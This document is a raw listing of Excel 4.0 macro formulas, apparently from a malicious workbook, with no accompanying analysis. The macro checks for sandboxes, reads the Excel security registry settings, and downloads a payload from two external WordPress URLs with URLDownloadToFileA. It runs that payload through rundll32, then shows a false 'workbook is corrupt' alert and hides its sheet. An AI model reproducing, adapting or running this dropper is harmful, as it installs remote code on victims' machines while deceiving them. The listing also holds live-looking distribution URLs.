=APP.MAXIMIZE() =IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),) =IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE)) ="C:\Users\Public\"&RANDBETWEEN(1,9999)&".reg" ="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&C6&" /y" =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",C7,0,5) =WAIT(0+"00:00:03") =FOPEN(C6) =FPOS(C10,215) =FREAD(C10,255) =FCLOSE(C10) =FILE.DELETE(C6) =IF(ISNUMBER(SEARCH("0001",C12)),CLOSE(FALSE),) ="C:\Users\Public\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr" ="http://rksinha.com//wp-content/themes/calliope/wp_data.php" ="http://baotruocde.com/wp-content/themes/calliope/wp_data.php" =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,C17,C16,0,0) =ERROR(FALSE) =FOPEN(C16,2) =IF(ISERROR(C21),,GOTO(R[2]C)) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,C18,C16,0,0) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr,DllRegisterServer",0,5) =CLOSE(FALSE) =WORKBOOK.HIDE("OX46O7IoY7",TRUE)